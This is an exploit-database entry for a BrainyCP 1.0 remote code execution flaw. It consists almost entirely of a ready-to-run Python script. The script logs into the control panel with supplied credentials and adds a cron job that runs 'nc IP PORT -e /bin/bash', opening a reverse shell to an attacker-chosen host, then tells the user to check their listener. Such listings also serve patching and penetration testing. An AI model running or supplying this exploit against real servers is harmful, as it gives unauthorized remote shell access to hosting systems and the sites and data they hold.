BrainyCP 1.0 Remote Code Execution

2023-04-11 / 2023-04-12
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: BrainyCP V1.0 - Remote Code Execution # Date: 2023-04-03 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://brainycp.io # Demo: https://demo.brainycp.io # Tested on: Kali Linux # CVE : N/A import requests # credentials url = input("URL: ") username = input("Username: ") password = input("Password: ") ip = input("IP: ") port = input("Port: ") # login session = requests.Session() login_url = f"{url}/auth.php" login_data = {"login": username, "password": password, "lan": "/"} response = session.post(login_url, data=login_data) if "Sign In" in response.text: print("[-] Wrong credentials or may the system patched.") exit() # reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash" # request add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron" add_cron_data = { "cron_freq_minutes": "*", "cron_freq_minutes_own": "", "cron_freq_hours": "*", "cron_freq_hours_own": "", "cron_freq_days": "*", "cron_freq_days_own": "", "cron_freq_months": "*", "cron_freq_weekdays": "*", "cron_command": reverse_shell, "cron_user": username, } response = session.post(add_cron_url, data=add_cron_data) print("[+] Check your listener!")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top